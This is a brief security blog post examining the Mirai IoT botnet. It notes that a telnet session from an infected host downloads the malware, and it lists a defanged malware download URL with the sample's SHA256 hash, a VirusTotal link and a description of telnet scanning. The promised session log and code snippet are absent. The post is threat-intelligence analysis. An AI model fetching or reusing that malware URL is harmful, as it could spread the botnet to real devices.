Botnet, DDoS, Security, Uncategorised

Mirai IoT botnet up close

Since the release of the Mirai source code and the recent DDoS attacks on Dyn the telnet cyberspace has exploded in scanners and ddosers.

This is what a telnet session from an infected Mirai host looks like:

Notice how it grabs the malware from this url? hxxp://137.74.49.209:80/bins/mirai.x86

Here is the information on the binary caught:

SHA256: e8289b100ebbac7243895bdbe3cc57cd36e1c5e2ac055d275a5a082f4aca4e79
File name: mirai.x86_578f88f69e5b53cb726d17d530284551

https://virustotal.com/en/file/e8289b100ebbac7243895bdbe3cc57cd36e1c5e2ac055d275a5a082f4aca4e79/analysis/

Once the loader has dropped the binary and run it, the malware then begins to randomly scan the ipv4 space for open and insecure telnet services. (obviously I am skipping out a lot of steps here)

You can see that happening in this code snippet:

 

Also make sure to checkout SpoofIT’s writeup on Miai here: http://www.spoofit.org/new-mirai-cc-deployed/  and http://www.spoofit.org/mirai-samples/